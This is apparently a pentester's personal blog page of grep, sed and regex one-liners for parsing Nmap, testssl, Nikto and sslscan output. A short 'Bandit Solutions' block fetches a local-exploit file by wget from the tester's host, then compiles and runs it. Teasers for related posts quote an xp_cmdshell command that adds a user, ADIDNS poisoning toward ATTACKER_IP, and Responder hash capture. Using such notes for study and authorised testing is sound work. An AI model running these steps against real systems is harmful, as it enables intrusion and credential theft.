Skip to main content

GREP

By 


Match Everything after a word
grep -Po 'WORD(.*)'
grep -oP '(?<=release)[^ ]*'
check this
Print all the directories in the given path with Full Absolute Path

ls -d1 "$(pwd)"/*/ 
Grep inside a Folder Recursive
grep -nr '100068  2,3,4,5    32800/udp   cmsd'

grep -nr 'A Wordpress installation was found' | grep -v AutoRecon  | cut -d '/' -f1 | sort -u

Grep IP Address and Ports from Nmap Scan Ouput

egrep -v "^#|Status: Up" 113-vlan | cut -d' ' -f2,4- | sed -n -e 's/Ignored.*//p' | grep open | sed 's/\/\/\/\///g' |sed 's/\/\/\///g' | sed 's/open\///g' | sed 's#//#/#g'

Output: 
127.0.0.1 80,443
127.0.0.2 8080, 9191
List directories which don't contain sub-directory named recon.  

find . -type d -exec test -e "{}/recon" \; -prune -o -type d -print| cut -d '/' -f2

Grep data from multiple webpages and Print everything after a given word 
for ip in $(cat $1); do
        output=$(curl -s http://$ip:/data --connect-timeout 2);
        release=$(echo $output |grep -oP '(?<=release\=\")[^ ]*' );
        echo $ip $release
        done 

Grep a string from a set of files and get only the required string

grep -nr 'X-XSS-Protection' | cut -d ":" -f1 | sed 's!.[^.]*$!!'
grep -nr 'X-XSS-Protection' | cut -d ":" -f1 | sed 's!.[^.]*$!!' | cut -d "_" -f3|  sed -z 's/\n/,/g;s/,$/\n/'

#Remove everything after Last '.' along with the . 
sed 's!.[^.]*$!!'

#Remove everything after the '.'
 sed 's![^.]*$!!' 

cut Explanation:
# -d = delimeter 
# -f = from/number of the delimiter 
# -f- = from 'to' to 

SED Explanation:
in the above example
 . --> the char that we are trying to match 
 ^ --> match the last find
 * --> match everything after 
 $!!-- > used to replace with a string (empty string in this case)
 $!+! --> replace with + instead of empty string 
Grep IP Address and Port from Nmap Output

#Grep X-XXS-Protection string from Nikto Output
grep -nr 'X-XSS-Protection'| grep nikto | cut -d ":" -f1 | cut -d '/' -f3 | sed 's!.[^.]*$!!' | grep -oP '(?<=nikto)[^ ]*' |grep -oP '(?<=_)[^ ]*' |  sed -z 's/_/, /g;s/,$/\n/'

#Grep for Diffie Helmen 1024 strength 
grep -nR "1024"  | grep -v AutoReco | grep "testssl" | cut -d "/" -f3 | sed 's!.[^.]*$!!' | sort -u | grep -oP '(?<=_)[^ ]*' | sed -z 's/_/, /g;s/,$/\n/'

#Grep a string from testssl output and print the ip addresses & port
grep -nr "Secure Client-Initiated Renegotiation"| cut -d " " -f1 | cut -d "-" -f 1 | sed -z 's/_p/, /g;s/,$/\n/'
grep -nr "Renegotiation" | grep recon | grep testssl | grep -v "supported (OK)" | grep -v "timed out" | grep -v "FIXME" |cut -d ":" -f1 | sed 's!.[^.]*$!!' | cut -d "_" -f2- |  sed -z  's/_/,/g'

# Grep for SWEET32
grep -nr "SWEET32" | grep recon | grep testssl | grep "64 bit" |cut -d ":" -f1 | sed 's!.[^.]*$!!' | cut -d "_" -f2- |  sed -z  's/_/,/g'

#output will be IP & Port; but we might need all the ports in a single row for each IP address
#do it in excel using the formula --> 

1st Column = IPaddress
2nd Comlumn = Port
3rd Comuln : =IF(A2=A1,C1&","&B2,B2) 
4th Column : =IF(A2<>A3,"Last","")

then filter for rows with "Last"
Copy paste the content :) 
Grepping JSON Data

#Find Path and Line objects from JSON data and combine them 
grep -Eo '"path": "[^"]*"' curl_verify.json | sed 's/"path": "\(.*\)"/\1/' > paths.txt

#In this case, "line" which is after 3 lines of path is considered as there are multiple objects with "line"
grep -A3 '"path":' curl_verify.json | grep -Eo '"line": [0-9]+' | awk -F ": " '{print " , " $2}' > lines.txt
paste -d ' ' paths.txt lines.txt > result.txt

#grep for all the lines with string "line"
grep -Eo '"line": [0-9]+' curl_verify.json | awk -F ": " '{print ", " $2}' > lines.txt


Replace newline with comma
sed -z 's/\n/,/g;s/,$/\n/'

Replace _ with , 
sed -z 's/_/,/g'

Regex to grep from Nmap Output 

Starting Nmap 7.93 ( https://nmap.org ) at 2022-06-07 02:49 EDT
Nmap scan report for 10.10.10.10
Host is up (0.0022s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Sample Program: 


            # Regular expression pattern to extract service name
           
             pattern = r'\d+\/\w+\s+\w+\s+(\w+)'

            # Find service name using regular expression
            matches = re.findall(pattern, output)
            # Check if any matches were found
            if matches:
               Service = matches[0]
                



Service - r'\d+\/\w+\s+\w+\s+(\w+)'
Service + Version - r'\d+\/\w+\s+\w+\s+(\S+.*)'
Grep TLS Version from TestSSL 


            cmd = f"testssl"
            address = f"{ip}:{port}"
            output = subprocess.run([cmd, "--warnings", "off", "--quiet", "-p", address], capture_output=True).stdout.decode().strip()

            # Remove ANSI color codes from the output
            ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
            output = ansi_escape.sub('', output)

            # Use regular expressions to find the status of each SSL/TLS protocol
            ssl_tls_protocols = re.findall(r"(SSLv\d+|TLS \d+(\.\d+)?)\s+offered \(deprecated\)", output)

            # Save the offered (deprecated) SSL/TLS protocols in a list
            offered_deprecated_protocols = [protocol for protocol, _ in ssl_tls_protocols]


            # Print the enabled SSL/TLS protocols as a single comma-separated string
            status = ', '.join(offered_deprecated_protocols)


Grep TLS Version from SSLScan 


            cmd = f"sslscan"
            address = f"{ip}:{port}"
            output = subprocess.run([cmd, address], capture_output=True).stdout.decode().strip()

            # Remove ANSI color codes from the output
            ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
            output = ansi_escape.sub('', output)

            # Use regular expressions to find the status of each SSL/TLS protocol
            ssl_tls_protocols = re.findall(r"(SSLv\d+|TLSv\d+\.\d+)\s+(enabled|disabled)", output)

            # Save the status of each enabled SSL/TLS protocol in a list
            enabled_protocols = [protocol for protocol, status in ssl_tls_protocols if status == 'enabled']

            # Print the enabled SSL/TLS protocols as a single comma-separated string
            status = ', '.join(enabled_protocols)




Excel Macro - Count the number of rows in each sheet and print it in the first sheet 

Sub CountRowsExcludingHeader()
    Dim ws As Worksheet
    Dim lastRow As Long
    Dim outputSheet As Worksheet
    Dim rowNum As Long
    
    Set outputSheet = ThisWorkbook.Worksheets(1)
    rowNum = 2 ' Start writing output from row 2
    
    outputSheet.Range("A1:B1").Value = Array("Sheet Name", "Number of Rows (excluding header)")
    
    For Each ws In ThisWorkbook.Worksheets
        lastRow = ws.Cells(ws.Rows.Count, 1).End(xlUp).Row
        outputSheet.Cells(rowNum, 1).Value = ws.Name
        outputSheet.Cells(rowNum, 2).Value = IIf(lastRow > 1, lastRow - 1, 0)
        rowNum = rowNum + 1
    Next ws
End Sub


Useful Sort, Order, Grep Commands 

#Order files by the size of directory/file
du -ah --max-depth=1 | sort -h

#search for a particular string
grep "millionth" data.txt       

# search in any location matching a specific user and group with size                               
find / -size 33c -user bandit7 -group bandit6 2>/dev/null      

#search for unique value
cat data.txt | sort | uniq -c | grep 1                     

#search for something with req text
strings data.txt | grep "=="                      

#find rot13 text
cat data.txt | tr a-zA-Z n-za-mN-ZA-M                      

#Find A FILE
find / -size 33c -user bandit7 -group bandit6 2>/dev/null   

#Count of logs
wc -l access.log    

#Get the number of times a website is accessed
cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn 

#Search inside of  files and directories
grep -Hrn 'search term' path/to/files                         

#find a file with specified name
find / -name ex*  

Playing with URL's

#Get Ip address for a list of url's
for url in $(cat text.txt); do host $url; done 

#Get Working/Accessible Links
for url in $(cat text.txt); do host $url; done | grep "has address" | cut -d " " -f 4 | sort -u

#get the links from the webpage
grep "href=" index.html | cut -d "/" -f 3 | grep "\." | cut -d '"' -f 1 | sort -u 


Bandit Solutions

#Find A FILE
find / -size 33c -user bandit7 -group bandit6 2>/dev/null   

searchsploit linux_version
cp /usr/share/exploitdb/exploits/linux/local/37292.c .    /Copy the exploit
python -m SimpleHTTPServer 7575                            /Create a python server
cd /tmp
wget http://myip:7575/37292.c          
gcc 37292.c -o exploit
./exploit
id



Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds
8 comments
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm
1 comment
Read more

Relay Attacks

By
Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/
3 comments
Read more